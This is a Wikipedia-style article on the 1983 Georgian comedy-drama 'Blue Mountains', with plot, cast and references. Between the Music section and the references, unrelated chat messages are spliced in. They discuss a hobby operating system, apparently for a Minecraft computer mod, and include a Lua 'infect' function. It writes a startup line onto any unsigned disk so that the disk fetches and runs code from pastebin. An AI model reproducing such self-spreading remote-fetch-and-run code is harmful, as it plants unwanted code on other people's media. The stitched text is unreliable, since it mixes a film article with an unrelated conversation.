Blue Mountains (1983 film)

Blue Mountains (Georgian: ცისფერი მთები ანუ დაუჯერებელი ამბავი, translit.: tsisperi mtebi anu daujerebeli ambavi) is a 1983 Georgian comedy-drama directed by Eldar Shengelaia. The film is about a passive young man Soso (Ramaz Giorgobiani), an author, entering the Soviet-controlled bureaucracy of Georgia attempting to get his novel published only to be neglected and compartmentalized at every turn. The film was selected for screening as part of the Cannes Classics section at the 2014 Cannes Film Festival.[1]

Blue Mountains, or unbelievable story
Directed byEldar Shengelaia
Written byRezo Cheishvili Eldar Shengelaia
StarringRamaz Giorgobiani Sesilia Takaishvili
Music byGiya Kancheli
Release date
  • 1983 (1983)
Running time
1h 38minutes
CountrySoviet Union (Georgian SSR)
LanguageGeorgian

Plot

Novelist Soso (Ramaz Giorgobiani) goes to his publishing house in an attempt to find someone interested in publishing his latest manuscript. The employees shuffle the author's manuscript around their office from person to person, but everyone seems to be too busy to actually read it. Soso ultimately discovers that the employees are wrapped up in anything but their direct duties and responsibilities so much that not even a giant structural flaw in the building can get their attention. The movie is an allegory of Soviet-time bureaucracy and Soviet system as a whole. At the end of the film, the house collapses and the employees move to another, brand new and modern building. However, that does not mean they change their attitude towards their work ...

Cast

  • Ramaz Giorgobiani as Soso - writer.
  • Vasil Kakhniashvili as Vaso
  • Teimuraz Chirgadze as Director
  • Ivane Sakvarelidze as Markscheider
  • Sesilia Takaishvili as cashier
  • Grigol Natsvlishvili
  • Vladimer Mezvrishvili
  • Otar Guntsadze
  • Darejan Sumbatashvili
  • Zeinab Botsvadze
  • Nino Tutberidze
  • Giorgi Chkhaidze
  • Mikheil Kikodze
  • Guram Lortkipanidze
  • Guram Petriashvili

[2]

Music

Music is Composed by Giya Kancheli.Soundtrack,Main music theme.

gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.

References

  1. "Festival de Cannes - Site Officiel / Institutionnel". Festival de Cannes (in French). Retrieved 2018-03-14.
  2. Shengelaia, Eldar (October 1986), Blue Mountains, or Unbelievable Story, Ramaz Giorgobiani, Vasil Kakhniashvili, Teimuraz Chirgadze, retrieved 2018-03-14
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.